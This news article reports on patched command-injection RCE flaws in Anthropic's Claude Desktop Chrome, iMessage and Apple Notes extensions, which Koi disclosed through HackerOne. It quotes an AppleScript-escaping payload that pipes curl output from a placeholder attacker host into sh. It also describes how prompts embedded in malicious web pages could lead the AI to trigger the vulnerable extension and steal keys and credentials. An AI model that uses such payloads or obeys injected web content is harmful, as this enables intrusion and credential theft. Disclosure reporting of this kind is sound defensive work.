Critical RCE Bugs In Claude Desktop Enable Malicious Code Execution

While cybersecurity headlines often spotlight shady extensions from obscure developers or massive supply chain attacks, even reputable sources can slip up in ways that threaten enterprises.

Researchers at Koi have uncovered critical remote code execution (RCE) vulnerabilities in three extensions created and promoted by Anthropic itself: the Chrome, iMessage, and Apple Notes connectors.

These sit prominently at the top of Claude Desktop’s extension marketplace, underscoring how trust in official tools doesn’t guarantee safety.

The flaws stem from basic command injection issues, allowing a malicious website to hijack seemingly harmless queries like “Where can I play paddle in Brooklyn?” and execute arbitrary code.

Attackers could snag SSH keys, AWS credentials, or browser passwords without installing malware or tricking users into phishing links.

It’s all triggered by normal AI interactions. Anthropic rated each vulnerability high-severity with a CVSS score of 8.9, but they’ve since patched them all.

Unpacking Claude Desktop Extensions

Claude Desktop extensions function as packaged MCP servers, installable in one click from Anthropic’s marketplace.

Delivered as .mcpb bundles essentially zipped archives with server code and function manifests they mirror Chrome extensions in ease but diverge sharply in power.

Unlike sandboxed browser add-ons, these run unsandboxed on your system with unrestricted permissions.

They can access files, run commands, grab credentials, and tweak settings, acting as direct bridges between Claude’s AI and your OS. This elevated access amplified the command injection risks.

The Flaw: Simple Injection, Severe Impact

At its core, the bug was straightforward and avoidable. Each extension’s MCP server took user input and fed it unfiltered into AppleScript commands, enabling shell execution with full privileges.

For instance, a request to “open this URL in Chrome” built AppleScript like tell application "Google Chrome" to open location "${url}" using raw interpolation.

A crafted URL could escape the string say, by injecting "& do shell script "curl https://attacker.com/trojan | sh"&" to run attacker code via do shell script.

This classic vulnerability turned everyday AI use into a vector.

Claude fetches web content to answer questions, so compromised pages in search results could embed prompts that exploit the extensions, granting remote foes local shell access through the AI’s trusted chain.

From Query To Compromise: A Real-World Scenario

Picture a user with the Chrome extension enabled asking about paddle spots in Brooklyn.

The AI obligingly triggers the extension, unleashing the payload to steal keys, exfiltrate data, or install backdoors all invisibly.

These official tools highlight broader MCP ecosystem risks, where rapid AI-driven development and lax reviews meet full-system access.

Independent extensions will only heighten the stakes. Users must treat them as potent executors, not mere plugins.

Koi disclosed the issues via Anthropic’s HackerOne program on July 3, 2025.

Partial fixes rolled out by August 14, with full patches in version 0.1.9 on August 28. Verification came September 19. Stay vigilant AI assistants are powerful, but so are their pitfalls.